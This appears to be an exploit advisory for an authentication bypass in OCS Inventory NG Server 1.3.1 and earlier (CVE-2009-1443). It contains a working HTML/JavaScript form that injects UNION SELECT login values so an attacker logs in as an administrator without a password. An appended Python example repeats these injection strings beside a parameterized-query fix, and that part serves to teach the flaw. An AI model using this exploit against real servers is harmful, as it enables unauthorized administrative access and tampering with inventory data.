OCS Inventory NG Server 1.3.1 - 'LOGIN' Remote Authentication Bypass

Related Vulnerabilities: CVE-2009-1443  
Publish Date: 06 May 2010

OCS Inventory NG Server <= 1.3.1 (login) Remote Authentication Bypass

 Software       : Open Computer and Software (OCS) Inventory NG
 Download       : http://www.ocsinventory-ng.org/
 Discovered by  : Nicolas DEROUET (nicolas.derouet[gmail]com)
 Discover       : 2010-02-05
 Published      : 2010-02-17
 Version        : 1.3.1 and prior (except 1.02.1 to 1.02.3)
 Impact         : Manipulation of data
 Remote         : Yes (No authentication is needed)

<html>
<head>
<title>OCS Inventory NG <= 1.3.1 (login) Remote Authentication Bypass</title>
<script type="text/javascript">
  function $(id) { return document.getElementById(id); }
  function $$(id) { return $(id).options[$(id).options.selectedIndex].value; }
  function bypass()
  {
    // Post to the selected entry point under the OCSReports base URL.
    $('log').action = $('ocsreports').value + $$('meth') + '?lang=' + $$('lang');
    // The login field carries a UNION SELECT, so the row the server reads back
    // is defined by the request instead of by the operators table.
    if ($$('type') == 0)
      $('login').value = "' UNION SELECT id, accesslvl, '' FROM operators WHERE id='" + $('user').value;
    else
      $('login').value = "' UNION SELECT '" + $('user').value + "', '" + $$('type') + "', '";
    $('pass').value = "";
    if ($$('meth') == 'header.php')
      alert('Please go to "' + $('ocsreports').value + '" (or click on the OCS logo) !');
  }
</script>
</head>
<body>
<form name="log" id="log" action="#" method="post">
  <table align="center" border="0" width="450px">
    <tr>
    <td><b>OCSReports :</b></td>
    <td><input type="text" id="ocsreports" size="40" value="" /></td>
    </tr>
    <tr>
    <td><b>Version :</b></td>
    <td><select id="meth">
          <option value="index.php" selected><= 1.02 --- 1.3b2 <=> 1.3b3</option>
          <option value="header.php"><= 1.0 (4100) --- 1.3b2 <=> 1.3.1</option>
        </select></td>
    </tr>
    <tr>
    <td><b>Login :</b></td>
    <td><input type="text" id="user" size="40" value="admin" /></td>
    </tr>
    <tr>
    <td><b>Type :</b></td>
    <td><select id='type'>
          <option value=0>Default (if login exists)</option>
          <option value=1>Administrator</option>
          <option value=2>User</option>
          <option value=3>Local user</option>
        </select></td>
    </tr>
    <tr>
    <td><b>Language :</b></td>
    <td><select id="lang">
          <option value="english" selected>English</option>
          <option value="french">French</option>
          <option value="german">German</option>
          <option value="spanish">Spanish</option>
        </select></td>
    </tr>
    <tr>
    <td><input type="hidden" name="login" id="login" />
        <input type="hidden" name="pass"  id="pass"  /></td>
    <td><input type="submit" name="subLogin" onclick="bypass();"></td>
    </tr>
  </table>
</form>
</body>
</html>
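
Added example, not part of the original advisory and not OCS Inventory code: a Python/sqlite3 model of the login lookup, showing the concatenated query beside the parameterized form. The query shape (`id`, `accesslvl` and one credential column from `operators`, ending at the quoted login) is an assumption inferred from the column count of the form's login values; the table contents and all function names are constructed for illustration.

```python
import hashlib, hmac, os, sqlite3

def derive(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def make_db() -> sqlite3.Connection:
    # Constructed stand-in for the operators table named in the form's login value.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE operators (id TEXT PRIMARY KEY, accesslvl INTEGER, passwd TEXT)")
    salt = os.urandom(16)
    stored = salt.hex() + "$" + derive("correct horse", salt).hex()
    db.execute("INSERT INTO operators VALUES (?, ?, ?)", ("admin", 1, stored))
    return db

def lookup_concat(db, login):
    # Assumed vulnerable pattern: the login value becomes part of the SQL text.
    sql = "SELECT id, accesslvl, passwd FROM operators WHERE id='" + login + "'"
    return db.execute(sql).fetchone()

def lookup_bound(db, login):
    # Hardened pattern: the login value is bound as data and never parsed as SQL.
    return db.execute(
        "SELECT id, accesslvl, passwd FROM operators WHERE id = ?", (login,)
    ).fetchone()

def authenticate(db, login, password):
    # Bound lookup plus a salted-hash check; returns (id, accesslvl) or None.
    row = lookup_bound(db, login)
    if row is None or "$" not in row[2]:
        return None
    salt_hex, hash_hex = row[2].split("$", 1)
    candidate = derive(password, bytes.fromhex(salt_hex)).hex()
    return (row[0], row[1]) if hmac.compare_digest(candidate, hash_hex) else None

# The two login values the form on this page builds (user "admin", type 1).
POC_DEFAULT = "' UNION SELECT id, accesslvl, '' FROM operators WHERE id='admin"
POC_TYPED = "' UNION SELECT 'admin', '1', '"

if __name__ == "__main__":
    db = make_db()
    for value in (POC_DEFAULT, POC_TYPED):
        # Concatenated: every field of the returned row, credential included,
        # comes from the request. Bound: no operator has that id, so no row.
        print(lookup_concat(db, value), lookup_bound(db, value),
              authenticate(db, value, ""))
    print(authenticate(db, "admin", "correct horse"))
```

Because the concatenated lookup returns a row whose credential column is also chosen by the request, hashing stored passwords alone does not close this hole; the query has to be parameterized.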